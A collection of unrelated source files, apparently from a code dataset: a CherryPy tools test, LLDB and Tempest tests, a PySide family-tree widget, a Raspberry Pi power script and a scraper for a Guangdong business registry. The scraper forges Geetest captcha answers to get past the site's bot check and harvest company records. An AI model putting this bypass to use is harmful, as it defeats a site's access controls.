cherrypy.tools.rotator = cherrypy.Tool('before_finalize', Rotator())
def stream_handler(next_handler, *args, **kwargs):
actual = cherrypy.request.config.get('tools.streamer.arg')
assert actual == 'arg value'
cherrypy.response.output = o = io.BytesIO()
try:
next_handler(*args, **kwargs)
# Ignore the response and return our accumulated output
# instead.
return o.getvalue()
finally:
o.close()
cherrypy.tools.streamer = cherrypy._cptools.HandlerWrapperTool(
stream_handler)
class Root:
@cherrypy.expose
def index(self):
return 'Howdy earth!'
@cherrypy.expose
@cherrypy.config(**{
'tools.streamer.on': True,
'tools.streamer.arg': 'arg value',
})
def tarfile(self):
actual = cherrypy.request.config.get('tools.streamer.arg')
assert actual == 'arg value'
cherrypy.response.output.write(b'I am ')
cherrypy.response.output.write(b'a tarfile')
@cherrypy.expose
def euro(self):
hooks = list(cherrypy.request.hooks['before_finalize'])
hooks.sort()
cbnames = [x.callback.__name__ for x in hooks]
assert cbnames == ['gzip'], cbnames
priorities = [x.priority for x in hooks]
assert priorities == [80], priorities
yield ntou('Hello,')
yield ntou('world')
yield europoundUnicode
# Bare hooks
@cherrypy.expose
@cherrypy.config(**{'hooks.before_request_body': pipe_body})
def pipe(self):
return cherrypy.request.body
# Multiple decorators; include kwargs just for fun.
# Note that rotator must run before gzip.
@cherrypy.expose
def decorated_euro(self, *vpath):
yield ntou('Hello,')
yield ntou('world')
yield europoundUnicode
decorated_euro = tools.gzip(compress_level=6)(decorated_euro)
decorated_euro = tools.rotator(scale=3)(decorated_euro)
root = Root()
class TestType(type):
"""Metaclass which automatically exposes all functions in each
subclass, and adds an instance of the subclass as an attribute
of root.
"""
def __init__(cls, name, bases, dct):
type.__init__(cls, name, bases, dct)
for value in dct.values():
if isinstance(value, types.FunctionType):
cherrypy.expose(value)
setattr(root, name.lower(), cls())
Test = TestType('Test', (object,), {})
# METHOD ONE:
# Declare Tools in _cp_config
@cherrypy.config(**{'tools.nadsat.on': True})
class Demo(Test):
def index(self, id=None):
return 'A good piece of cherry pie'
def ended(self, id):
return repr(tools.nadsat.ended[id])
def err(self, id=None):
raise ValueError()
def errinstream(self, id=None):
yield 'nonconfidential'
raise ValueError()
yield 'confidential'
# METHOD TWO: decorator using Tool()
# We support Python 2.3, but the @-deco syntax would look like
# this:
# @tools.check_access()
def restricted(self):
return 'Welcome!'
restricted = myauthtools.check_access()(restricted)
userid = restricted
def err_in_onstart(self):
return 'success!'
@cherrypy.config(**{'response.stream': True})
def stream(self, id=None):
for x in range(100000000):
yield str(x)
conf = {
# METHOD THREE:
# Declare Tools in detached config
'/demo': {
'tools.numerify.on': True,
'tools.numerify.map': {b'pie': b'3.14159'},
},
'/demo/restricted': {
'request.show_tracebacks': False,
},
'/demo/userid': {
'request.show_tracebacks': False,
'myauth.check_access.default': True,
},
'/demo/errinstream': {
'response.stream': True,
},
'/demo/err_in_onstart': {
# Because this isn't a dict, on_start_resource will error.
'tools.numerify.map': 'pie->3.14159'
},
# Combined tools
'/euro': {
'tools.gzip.on': True,
'tools.encode.on': True,
},
# Priority specified in config
'/decorated_euro/subpath': {
'tools.gzip.priority': 10,
},
# Handler wrappers
'/tarfile': {'tools.streamer.on': True}
}
app = cherrypy.tree.mount(root, config=conf)
app.request_class.namespaces['myauth'] = myauthtools
root.tooldecs = _test_decorators.ToolExamples()
def testHookErrors(self):
self.getPage('/demo/?id=1')
# If body is "razdrez", then on_end_request is being called too early.
self.assertBody('A horrorshow lomtick of cherry 3.14159')
# If this fails, then on_end_request isn't being called at all.
time.sleep(0.1)
self.getPage('/demo/ended/1')
self.assertBody('True')
valerr = '\n raise ValueError()\nValueError'
self.getPage('/demo/err?id=3')
# If body is "razdrez", then on_end_request is being called too early.
self.assertErrorPage(502, pattern=valerr)
# If this fails, then on_end_request isn't being called at all.
time.sleep(0.1)
self.getPage('/demo/ended/3')
self.assertBody('True')
# If body is "razdrez", then on_end_request is being called too early.
if (cherrypy.server.protocol_version == 'HTTP/1.0' or
getattr(cherrypy.server, 'using_apache', False)):
self.getPage('/demo/errinstream?id=5')
# Because this error is raised after the response body has
# started, the status should not change to an error status.
self.assertStatus('200 OK')
self.assertBody('nonconfidential')
else:
# Because this error is raised after the response body has
# started, and because it's chunked output, an error is raised by
# the HTTP client when it encounters incomplete output.
self.assertRaises((ValueError, IncompleteRead), self.getPage,
'/demo/errinstream?id=5')
# If this fails, then on_end_request isn't being called at all.
time.sleep(0.1)
self.getPage('/demo/ended/5')
self.assertBody('True')
# Test the "__call__" technique (compile-time decorator).
self.getPage('/demo/restricted')
self.assertErrorPage(401)
# Test compile-time decorator with kwargs from config.
self.getPage('/demo/userid')
self.assertBody('Welcome!')
def testEndRequestOnDrop(self):
old_timeout = None
try:
httpserver = cherrypy.server.httpserver
old_timeout = httpserver.timeout
except (AttributeError, IndexError):
return self.skip()
try:
httpserver.timeout = timeout
# Test that on_end_request is called even if the client drops.
self.persistent = True
try:
conn = self.HTTP_CONN
conn.putrequest('GET', '/demo/stream?id=9', skip_host=True)
conn.putheader('Host', self.HOST)
conn.endheaders()
# Skip the rest of the request and close the conn. This will
# cause the server's active socket to error, which *should*
# result in the request being aborted, and request.close being
# called all the way up the stack (including WSGI middleware),
# eventually calling our on_end_request hook.
finally:
self.persistent = False
time.sleep(timeout * 2)
# Test that the on_end_request hook was called.
self.getPage('/demo/ended/9')
self.assertBody('True')
finally:
if old_timeout is not None:
httpserver.timeout = old_timeout
def testGuaranteedHooks(self):
# The 'critical' on_start_resource hook is 'failsafe' (guaranteed
# to run even if there are failures in other on_start methods).
# This is NOT true of the other hooks.
# Here, we have set up a failure in NumerifyTool.numerify_map,
# but our 'critical' hook should run and set the error to 502.
self.getPage('/demo/err_in_onstart')
self.assertErrorPage(502)
tmpl = "AttributeError: 'str' object has no attribute '{attr}'"
expected_msg = tmpl.format(attr='items')
self.assertInBody(expected_msg)
def testCombinedTools(self):
expectedResult = (ntou('Hello,world') +
europoundUnicode).encode('utf-8')
zbuf = io.BytesIO()
zfile = gzip.GzipFile(mode='wb', fileobj=zbuf, compresslevel=9)
zfile.write(expectedResult)
zfile.close()
self.getPage('/euro',
headers=[
('Accept-Encoding', 'gzip'),
('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')])
self.assertInBody(zbuf.getvalue()[:3])
if not HAS_GZIP_COMPRESSION_HEADER_FIXED:
# NOTE: CherryPy adopts a fix from the CPython bug 39389
# NOTE: introducing a variable compression XFL flag that
# NOTE: was hardcoded to "best compression" before. And so
# NOTE: we can only test it on CPython versions that also
# NOTE: implement this fix.
return
zbuf = io.BytesIO()
zfile = gzip.GzipFile(mode='wb', fileobj=zbuf, compresslevel=6)
zfile.write(expectedResult)
zfile.close()
self.getPage('/decorated_euro', headers=[('Accept-Encoding', 'gzip')])
self.assertInBody(zbuf.getvalue()[:3])
# This returns a different value because gzip's priority was
# lowered in conf, allowing the rotator to run after gzip.
# Of course, we don't want breakage in production apps,
# but it proves the priority was changed.
self.getPage('/decorated_euro/subpath',
headers=[('Accept-Encoding', 'gzip')])
self.assertInBody(bytes([(x + 3) % 256 for x in zbuf.getvalue()]))
def testBareHooks(self):
content = 'bit of a pain in me gulliver'
self.getPage('/pipe',
headers=[('Content-Length', str(len(content))),
('Content-Type', 'text/plain')],
method='POST', body=content)
self.assertBody(content)
def testHandlerWrapperTool(self):
self.getPage('/tarfile')
self.assertBody('I am a tarfile')
def testToolWithConfig(self):
if not sys.version_info >= (2, 5):
return self.skip('skipped (Python 2.5+ only)')
self.getPage('/tooldecs/blah')
self.assertHeader('Content-Type', 'application/data')
def testWarnToolOn(self):
# get
try:
cherrypy.tools.numerify.on
except AttributeError:
pass
else:
raise AssertionError('Tool.on did not error as it should have.')
# set
try:
cherrypy.tools.numerify.on = True
except AttributeError:
pass
else:
raise AssertionError('Tool.on did not error as it should have.')
def testDecorator(self):
@cherrypy.tools.register('on_start_resource')
def example():
pass
self.assertTrue(isinstance(cherrypy.tools.example, cherrypy.Tool))
self.assertEqual(cherrypy.tools.example._point, 'on_start_resource')
@cherrypy.tools.register( # noqa: F811
'before_finalize', name='renamed', priority=60,
)
def example(): # noqa: F811
pass
self.assertTrue(isinstance(cherrypy.tools.renamed, cherrypy.Tool))
self.assertEqual(cherrypy.tools.renamed._point, 'before_finalize')
self.assertEqual(cherrypy.tools.renamed._name, 'renamed')
self.assertEqual(cherrypy.tools.renamed._priority, 60)
class SessionAuthTest(unittest.TestCase):
def test_login_screen_returns_bytes(self):
"""
login_screen must return bytes even if unicode parameters are passed.
Issue 1132 revealed that login_screen would return unicode if the
username and password were unicode.
"""
sa = cherrypy.lib.cptools.SessionAuth()
res = sa.login_screen(None, username=str('nobody'),
password=str('anypass'))
self.assertTrue(isinstance(res, bytes))
class TestHooks:
def test_priorities(self):
"""
Hooks should sort by priority order.
"""
Hook = cherrypy._cprequest.Hook
hooks = [
Hook(None, priority=48),
Hook(None),
Hook(None, priority=49),
]
hooks.sort()
by_priority = operator.attrgetter('priority')
priorities = list(map(by_priority, hooks))
assert priorities == [48, 49, 50]
| bsd-3-clause | 6,756,501,824,094,149,000 | 36.581053 | 79 | 0.555151 | false |
apple/llvm-project | lldb/test/API/python_api/value/empty_class/TestValueAPIEmptyClass.py | 4 | 1978 |
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class ValueAPIEmptyClassTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def test(self):
self.build()
exe = self.getBuildArtifact("a.out")
line = line_number('main.cpp', '// Break at this line')
# Create a target by the debugger.
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
# Create the breakpoint inside function 'main'.
breakpoint = target.BreakpointCreateByLocation('main.cpp', line)
self.assertTrue(breakpoint, VALID_BREAKPOINT)
# Now launch the process, and do not stop at entry point.
process = target.LaunchSimple(
None, None, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
# Get Frame #0.
self.assertEquals(process.GetState(), lldb.eStateStopped)
thread = lldbutil.get_stopped_thread(
process, lldb.eStopReasonBreakpoint)
self.assertTrue(
thread.IsValid(),
"There should be a thread stopped due to breakpoint condition")
frame0 = thread.GetFrameAtIndex(0)
        # Verify that we can access a frame variable with an empty class type
e = frame0.FindVariable('e')
self.assertTrue(e.IsValid(), VALID_VARIABLE)
self.DebugSBValue(e)
self.assertEqual(e.GetNumChildren(), 0)
        # Verify that we can access a frame variable that is a pointer to an
# empty class
ep = frame0.FindVariable('ep')
self.assertTrue(ep.IsValid(), VALID_VARIABLE)
self.DebugSBValue(ep)
# Verify that we can dereference a pointer to an empty class
epd = ep.Dereference()
self.assertTrue(epd.IsValid(), VALID_VARIABLE)
self.DebugSBValue(epd)
self.assertEqual(epd.GetNumChildren(), 0)
| apache-2.0 | 5,723,604,370,292,421,000 | 34.963636 | 80 | 0.651668 | false |
nikolay-fedotov/tempest | tempest/scenario/test_large_ops.py | 1 | 3433 | # Copyright 2013 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.common.utils import data_utils
from tempest import config
from tempest.openstack.common import log as logging
from tempest.scenario import manager
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestLargeOpsScenario(manager.ScenarioTest):
"""
Test large operations.
This test below:
* Spin up multiple instances in one nova call, and repeat three times
* as a regular user
* TODO: same thing for cinder
"""
@classmethod
def resource_setup(cls):
if CONF.scenario.large_ops_number < 1:
raise cls.skipException("large_ops_number not set to multiple "
"instances")
cls.set_network_resources()
super(TestLargeOpsScenario, cls).resource_setup()
def _wait_for_server_status(self, status):
for server in self.servers:
# Make sure nova list keeps working throughout the build process
self.servers_client.list_servers()
self.servers_client.wait_for_server_status(server['id'], status)
def nova_boot(self):
name = data_utils.rand_name('scenario-server-')
flavor_id = CONF.compute.flavor_ref
secgroup = self._create_security_group()
self.servers_client.create_server(
name,
self.image,
flavor_id,
min_count=CONF.scenario.large_ops_number,
security_groups=[secgroup])
# needed because of bug 1199788
params = {'name': name}
_, server_list = self.servers_client.list_servers(params)
self.servers = server_list['servers']
for server in self.servers:
# after deleting all servers - wait for all servers to clear
# before cleanup continues
self.addCleanup(self.servers_client.wait_for_server_termination,
server['id'])
for server in self.servers:
self.addCleanup_with_wait(
waiter_callable=(self.servers_client.
wait_for_server_termination),
thing_id=server['id'], thing_id_param='server_id',
cleanup_callable=self.delete_wrapper,
cleanup_args=[self.servers_client.delete_server, server['id']])
self._wait_for_server_status('ACTIVE')
def _large_ops_scenario(self):
self.glance_image_create()
self.nova_boot()
@test.services('compute', 'image')
def test_large_ops_scenario_1(self):
self._large_ops_scenario()
@test.services('compute', 'image')
def test_large_ops_scenario_2(self):
self._large_ops_scenario()
@test.services('compute', 'image')
def test_large_ops_scenario_3(self):
self._large_ops_scenario()
| apache-2.0 | 6,109,670,027,558,396,000 | 34.760417 | 79 | 0.635887 | false |
DayGitH/Family-Tree | node.py | 1 | 3177 | from PySide import QtCore, QtGui
import sys
class Actor(QtGui.QGraphicsWidget):
nick_name = ''
real_name = ''
gender = ''
bday = ''
age = ''
marital = ''
children = ''
death = ''
important = False
notes = ''
def __init__(self, nick_name, real_name, gender, bday, age, marital, children, death, important, notes, parent=None):
super(Actor, self).__init__(parent)
self.nick_name = nick_name
self.real_name = real_name
self.gender = gender
self.bday = bday
self.age = age
if marital == ['S000']:
self.marital = 'Single'
elif marital[-1][0] == 'M':
self.marital = 'Married'
elif marital[-1][0] == 'W':
self.marital = 'Widower' if self.gender == 'M' else ('Widow' if gender == 'F' else '')
elif marital[-1][0] == 'D':
self.marital = 'Divorced'
elif marital[-1][0] == 'E':
self.marital = 'Engaged'
if children == ['']:
self.children = 0
else:
self.children = len(children)
self.death = death
self.important = important
self.notes = notes
def headerRect(self):
return QtCore.QRectF(-55,-60,110,35)
def boundingRect(self):
return QtCore.QRectF(-60, -60, 120, 120)
def shape(self):
path = QtGui.QPainterPath()
path.addEllipse(self.boundingRect())
return path
def paint(self, painter, option, widget):
r = self.boundingRect()
h = self.headerRect()
painter.setBrush(QtGui.QColor.fromHsv(255,0,255,160))
painter.drawEllipse(r)
if self.gender == 'M':
painter.setBrush(QtGui.QColor.fromHsv(240,255,255,255))
elif self.gender == 'F':
painter.setBrush(QtGui.QColor.fromHsv(0,255,255,255))
painter.drawRoundedRect(h,5,5)
text = self.nick_name
painter.setPen(QtCore.Qt.white)
painter.drawText(h,QtCore.Qt.AlignCenter, text)
text = '\n'.join((self.real_name, str(self.age) + ' - ' + self.marital,
self.bday, 'Children: ' + str(self.children)))
painter.setPen(QtCore.Qt.black)
painter.drawText(r,QtCore.Qt.AlignCenter, text)
class View(QtGui.QGraphicsView):
def resizeEvent(self, event):
super(View, self).resizeEvent(event)
self.fitInView(self.sceneRect(), QtCore.Qt.KeepAspectRatio)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
scene = QtGui.QGraphicsScene(-350,-350,700,700)
actor = Actor('Akber','Akber Ali','M','1991-Jan-28', 23,'Single',0,'2051-Jan-28',True, '')
actor.setPos(0,0)
scene.addItem(actor)
view = View(scene)
view.setWindowTitle("Animated Tiles")
view.setViewportUpdateMode(QtGui.QGraphicsView.BoundingRectViewportUpdate)
view.setCacheMode(QtGui.QGraphicsView.CacheBackground)
view.setRenderHints(
QtGui.QPainter.Antialiasing | QtGui.QPainter.SmoothPixmapTransform)
view.show()
sys.exit(app.exec_()) | cc0-1.0 | 5,410,718,640,994,726,000 | 30.78 | 121 | 0.56972 | false |
9468305/script | geetest_offline/geetest_offline_gd.py | 1 | 12177 | #!/usr/local/bin/python3
# -*- coding: utf-8 -*-
'''
geetest offline 6.0.0 spider for gd.gsxt.org.cn
'''
import os
import time
import random
import logging
from logging import NullHandler
import json
import requests
import execjs
from bs4 import BeautifulSoup
import constants
import util
logging.getLogger(__name__).addHandler(NullHandler())
logging.basicConfig(level=logging.DEBUG)
HOST = 'http://gd.gsxt.gov.cn'
INDEX = HOST
JSRUNTIME = execjs.get(execjs.runtime_names.Node)
USERRESPONSE_JSCONTEXT = JSRUNTIME.compile(util.USERRESPONSE_JS)
TIMEOUT = 15
GD_LIST_FILE = 'gd_list.json'
GD_RESULT_FILE = 'gd_result.json'
GD_NOTFOUND_FILE = 'gd_notfound.json'
def load_json(json_file):
'''load json file'''
if not os.path.isfile(json_file):
logging.info("Json File Not Exist")
return None
with open(json_file, 'r', encoding='utf8') as _f:
json_data = json.load(_f)
logging.info(len(json_data))
return json_data
def save_json(json_file, json_data):
'''save json file'''
with open(json_file, 'w', encoding='utf8') as _f:
json.dump(json_data, _f, indent=2, sort_keys=True, ensure_ascii=False)
logging.info(len(json_data))
def calc_userresponse(distance, challenge):
    '''Compute the userresponse string from the sliding distance and the challenge.'''
return USERRESPONSE_JSCONTEXT.call('userresponse', distance, challenge)
def calc_validate(challenge):
'''calculate validate'''
_r = random.randint(0, len(util.OFFLINE_SAMPLE)-1)
distance, rand0, rand1 = util.OFFLINE_SAMPLE[_r]
distance_r = calc_userresponse(distance, challenge)
rand0_r = calc_userresponse(rand0, challenge)
rand1_r = calc_userresponse(rand1, challenge)
validate = distance_r + '_' + rand0_r + '_' + rand1_r
logging.debug(validate)
return validate
def parse_name_url(html_doc):
    '''Parse the HTML page with BeautifulSoup and collect the company detail links.'''
_soup = BeautifulSoup(html_doc, 'html.parser')
_findall = _soup.find_all('div',
class_="clickStyle",
style='margin-left: 160px;padding-left: 10px;')
name_url_array = []
if _findall:
for _a in _findall:
_company = _a.find('a')
_name = ''.join(_company.get_text().split())
_url = _company['href']
if _url.startswith('../'):
_url = INDEX + '/aiccips/CheckEntContext/' + _url
name_url_array.append((_name, _url))
logging.info(name_url_array)
else:
logging.error('Company Link Not Found')
return name_url_array
def get_mainpage(session):
'''
Get http://gd.gsxt.gov.cn
Response Code 200
'''
logging.debug('GET ' + INDEX)
_headers = {'Accept': constants.ACCEPT_HTML,
'Accept-Language': constants.ACCEPT_LANGUAGE,
'User-Agent': constants.USER_AGENT}
_response = session.get(INDEX, headers=_headers, timeout=TIMEOUT)
logging.debug('response code:' + str(_response.status_code))
return _response.status_code == 200
def get_captcha(session):
'''
GET /aiccips//verify/start.html
Response JSON
{
"success": 0,
"gt": "c02ee51ee0afe88899efe6dc729627fc",
"challenge": "ed3d2c21991e3bef5e069713af9fa6caed"
}
'''
_url = INDEX + '/aiccips//verify/start.html'
logging.debug('GET ' + _url)
_headers = {'Accept': constants.ACCEPT_JSON,
'Accept-Language': constants.ACCEPT_LANGUAGE,
'User-Agent': constants.USER_AGENT,
'Referer': INDEX,
'X-Requested-With': 'XMLHttpRequest'}
_params = {'t': str(int(time.time() * 1000))}
_response = session.get(_url, headers=_headers, params=_params, timeout=TIMEOUT)
logging.debug('response code: ' + str(_response.status_code))
logging.debug('response text: ' + _response.text)
if _response.status_code != 200:
return False
return _response.json()
def post_validate(session, challenge, validate, keyword):
'''
POST /aiccips/verify/sec.html
Response JSON
{
"status": "success",
"textfield": "waY5F5lZyxvKw9bMM4nBs7HUgWS1SRpagFutRKqs/+DkRqCIS9N4PUCqM9fmrbg1",
"version": "3.3.0"
}
'''
_url = INDEX + '/aiccips/verify/sec.html'
logging.debug('POST ' + _url)
_headers = {'Accept': constants.ACCEPT_JSON,
'Accept-Language': constants.ACCEPT_LANGUAGE,
'User-Agent': constants.USER_AGENT,
'Referer': INDEX,
'X-Requested-With': 'XMLHttpRequest',
'Origin': HOST}
_params = [('textfield', keyword),
('geetest_challenge', challenge),
('geetest_validate', validate),
('geetest_seccode', validate + '|jordan')]
_response = session.post(_url, headers=_headers, data=_params, timeout=TIMEOUT)
logging.debug('response code: ' + str(_response.status_code))
logging.debug('response text: ' + _response.text)
if _response.status_code != 200:
return False
_json_obj = _response.json()
logging.debug(_json_obj)
return _json_obj['textfield'] if _json_obj['status'] == 'success' else None
def post_search(session, textfield):
'''
POST /aiccips/CheckEntContext/showCheck.html
Response HTML WebPage
'''
_url = INDEX + '/aiccips/CheckEntContext/showCheck.html'
logging.debug('POST ' + _url)
_headers = {'Accept': constants.ACCEPT_HTML,
'Accept-Language': constants.ACCEPT_LANGUAGE,
'User-Agent': constants.USER_AGENT,
'Referer': INDEX,
'X-Requested-With': 'XMLHttpRequest',
'Origin': HOST}
_params = [('textfield', textfield),
('type', 'nomal')]
_response = session.post(_url, headers=_headers, data=_params, timeout=TIMEOUT)
logging.debug('response code: ' + str(_response.status_code))
logging.debug('response text: ' + _response.text)
if _response.status_code != 200:
return None
return parse_name_url(_response.text)
def get_validate(session, keyword):
'''safe loop post validate'''
for _ in range(10):
captcha = get_captcha(session)
if not captcha:
return None
validate = calc_validate(captcha['challenge'])
textfield = post_validate(session, captcha['challenge'], validate, keyword)
if textfield:
return textfield
return None
def parse_detail_sz(html_doc):
'''parse company detail for shenzhen'''
_soup = BeautifulSoup(html_doc, 'html.parser')
_yyzz = _soup.find('div', class_='item_box', id='yyzz')
if not _yyzz:
logging.error('Detail yyzz Not Found')
return None
_li_all = _yyzz.find_all('li')
if not _li_all:
logging.error("Detail li Not Found")
return None
_info = {}
for _li in _li_all:
_text = ''.join(_li.get_text().split())
_k, _v = _text.split(sep=':', maxsplit=1)
_info[_k] = _v
logging.info(_info)
if not _info['企业名称']:
_info = None # for safe
return _info
def parse_detail(html_doc):
'''parse company detail for guangzhou and other'''
_soup = BeautifulSoup(html_doc, 'html.parser')
_table = _soup.find('table', cellspacing='6')
if not _table:
logging.error('Detail table Not Found')
return None
_tr_all = _table.find_all('td')
if not _tr_all:
logging.error("Detail td Not Found")
return None
_info = {}
for _td in _tr_all:
_text = ''.join(_td.get_text().split())
if _text == '营业执照信息':
continue
_k, _v = _text.split(sep=':', maxsplit=1)
_temp = {}
_temp[_k] = _v
for _k2, _v2 in _temp.items():
if _k2 == '.企业名称' or _k2 == '.名称':
_info['企业名称'] = _v2
elif _k2 == '.统一社会信用代码/注册号' or _k2 == '.注册号':
_info['注册号/统一社会信用代码'] = _v2
elif _k2 == '.类型':
_info['类型'] = _v2
elif _k2 == '.负责人' or _k2 == '.经营者':
_info['法定代表人'] = _v2
elif _k2 == '.成立日期' or _k2 == '.注册日期':
_info['成立日期'] = _v2
elif _k2 == '.营业期限自':
_info['营业期限自'] = _v2
elif _k2 == '.营业期限至':
_info['营业期限至'] = _v2
elif _k2 == '.登记机关':
_info['登记机关'] = _v2
elif _k2 == '.核准日期':
_info['核准日期'] = _v2
elif _k2 == '.登记状态':
_info['登记状态'] = _v2
elif _k2 == '.营业场所' or _k2 == '.经营场所':
_info['住所'] = _v2
elif _k2 == '.经营范围':
_info['经营范围'] = _v2
_info['注册资本'] = '0'
logging.info(_info)
if not _info['企业名称']:
_info = None # for safe
return _info
def query_keyword(session, keyword):
'''query keyword'''
#if not get_mainpage(session):
# return None
logging.info(keyword)
textfield = get_validate(session, keyword)
if textfield:
return post_search(session, textfield)
return None
def safe_query_keyword(keyword):
'''Safe query keyword, handle network timeout and retry'''
for _ in range(5):
try:
with requests.Session() as session:
return query_keyword(session, keyword)
except requests.RequestException as _e:
logging.error(_e)
time.sleep(5)
return None
def query_detail(session, url):
'''query company detail url'''
logging.debug('GET ' + url)
_headers = {'Accept': constants.ACCEPT_HTML,
'Accept-Language': constants.ACCEPT_LANGUAGE,
'User-Agent': constants.USER_AGENT}
_response = session.get(url, headers=_headers, timeout=TIMEOUT)
logging.debug('response code:' + str(_response.status_code))
if _response.status_code == 200:
        if url.find('www.szcredit.org.cn') != -1:
            return parse_detail_sz(_response.text)
        elif url.find('GSpublicityList.html') != -1:
            return parse_detail(_response.text)
        else:
            logging.error('URL type not supported')
return None
def safe_query_detail(url):
'''Safe query url, handle network timeout and retry multi times.'''
for _ in range(5):
try:
with requests.Session() as session:
return query_detail(session, url)
except requests.RequestException as _e:
logging.error(_e)
time.sleep(5)
return None
def query_entry():
'''main entry'''
lists = load_json(GD_LIST_FILE)
if not lists:
lists = []
results = load_json(GD_RESULT_FILE)
if not results:
results = {}
notfound = load_json(GD_NOTFOUND_FILE)
if not notfound:
notfound = []
for keyword in lists:
if keyword in results:
continue
if keyword in notfound:
continue
name_url_array = safe_query_keyword(keyword)
if not name_url_array:
notfound.append(keyword)
continue
for name, url in name_url_array:
if name in results:
continue
detail_dict = safe_query_detail(url)
if detail_dict:
results.update({name : detail_dict})
        save_json(GD_RESULT_FILE, results)
        save_json(GD_NOTFOUND_FILE, notfound)
logging.info('done')
if __name__ == "__main__":
query_entry()
| mit | -263,166,151,455,258,660 | 30.441096 | 85 | 0.556119 | false |
HugoMMRabson/fonsa | src/my/installer/copyintomaple/atxraspisettings.py | 1 | 6164 | #!/usr/bin/python3
'''
Created on Aug 18, 2019
@author: johnrabsonjr
'''
import os
from queue import Queue
import sys
import time
import RPi.GPIO as GPIO # @UnresolvedImport
REBOOTPULSEMINIMUM = None
REBOOTPULSEMAXIMUM = None
SHUT_DOWN = None
BOOTOK = None
ATXRASPI_SOFTBTN = None
FACTORYRESET = None
GREEN22 = None
BLUE23 = None
RED15 = None
PB1000C_LBO = None
MAPLEDRIVE = None
PB1000C_SHOULD_I_PULL_UP_OR_DOWN = None
WHITE, PERIWINKLE, YELLOW, GREEN, VIOLET, BLUE, RED, BLACK = ('white', 'periwinkle', 'yellow', 'green', 'violet', 'blue', 'red', 'black')
ALL_POTENTIAL_COLORS = (WHITE, PERIWINKLE, YELLOW, GREEN, VIOLET, BLUE, RED, BLACK)
def singleton(cls):
"""
See http://stackoverflow.com/questions/674304/pythons-use-of-new-and-init?ref=mythemeco&t=pack for explanation
"""
instances = {}
def getinstance():
if cls not in instances:
instances[cls] = cls()
return instances[cls]
return getinstance
def is_battery_low():
return True if GPIO.input(PB1000C_LBO) == 0 else False
def shut_it_down(reboot=False):
# MyLEDController.show_led_color(RED)
# GPIO.output(BOOTOK, 0)
if reboot:
logit("shut_it_down is rebooting me")
if MAPLEDRIVE:
logit("... but we're a mapledrive. So, in all likelihood, reboot=>shutdown.")
os.system('sudo reboot')
else:
logit("shut_it_down is calling poweroff")
GPIO.output(ATXRASPI_SOFTBTN, 1)
os.system('sudo poweroff')
def poweroff_now(reboot=False):
magic_key = 'b' if reboot else 'o'
for (val,
fname) in (('3',
'/proc/sys/kernel/printk'), ('3',
'/proc/sys/vm/drop_caches'),
('256', '/proc/sys/vm/min_free_kbytes'),
('1', '/proc/sys/vm/overcommit_memory'),
('1', '/proc/sys/vm/oom_kill_allocating_task'),
('0', '/proc/sys/vm/oom_dump_tasks'),
('1', '/proc/sys/kernel/sysrq'), (magic_key,
'/proc/sysrq-trigger')):
with open(fname, 'w') as f:
f.write(
val
) # See http://major.io/2009/01/29/linux-emergency-reboot-or-shutdown-with-magic-commands/
def logit(s):
print(s)
os.system('echo "$(date) %s" >> /var/log/atxraspi.log' % s)
def setup_gpio():
GPIO.setmode(GPIO.BOARD)
GPIO.setup(BOOTOK, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(ATXRASPI_SOFTBTN, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(SHUT_DOWN, GPIO.IN, pull_up_down=GPIO.PUD_UP)
if MAPLEDRIVE:
GPIO.setup(GREEN22, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(BLUE23, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(RED15, GPIO.OUT, initial=GPIO.HIGH)
GPIO.setup(PB1000C_LBO, GPIO.IN, pull_up_down=PB1000C_SHOULD_I_PULL_UP_OR_DOWN)
GPIO.setup(FACTORYRESET, GPIO.IN, pull_up_down=GPIO.PUD_UP)
class ThreadToServiceGPIOLED(object):
""" Threading example class
The run() method will be started and it will run in the background
until the application exits.
"""
def __init__(self, q):
""" Constructor
:type interval: int
:param interval: Check interval, in seconds
"""
import threading
self.q = q
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
self.coldct = { WHITE:(0, 0, 0), PERIWINKLE:(0, 0, 1), YELLOW:(0, 1, 0), GREEN:(0, 1, 1), VIOLET:(1, 0, 0), BLUE:(1, 0, 1), RED:(1, 1, 0), BLACK:(1, 1, 1) }
thread.start() # Start the execution
def run(self):
""" Method that runs forever """
old_color_chain = None
while True:
if self.q.empty() is True:
if old_color_chain is None:
time.sleep(.1) # There's no flashing for us to do.
else:
self.flash_the_led_in_this_sequence(old_color_chain)
else:
try:
color_chain, repetitions = self.q.get(timeout=5)
except:
logit("That's odd. Queue wasn't empty a moment ago, but it is now.")
else:
assert(repetitions >= 0)
if repetitions > 0:
for _ in range(repetitions):
self.flash_the_led_in_this_sequence(color_chain)
else:
old_color_chain = color_chain
def flash_the_led_in_this_sequence(self, color_chain):
for (col, dur) in color_chain:
self.illuminate_led_appropriately(col)
time.sleep(dur)
def illuminate_led_appropriately(self, pulse_color):
a, b, c = self.coldct[pulse_color]
try:
GPIO.output(GREEN22, a)
GPIO.output(BLUE23, b)
GPIO.output(RED15, c)
except RuntimeError:
print("Warning --- you haven't run setup_gpio() yet. Therefore, I can't set the colors of the LEDs yet.")
def get_cpu_temp(): # get_cpu_temp_raw()
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
t = float(f.read().strip('\n')) / 1000.
return t
except Exception as ex: # (FileNotFoundError, TypeError, ValueError) as ex:
logit('''get_cpu_temp failed --- %s --- returning 0''' % str(ex))
return 0.
@singleton
class _MyLEDController:
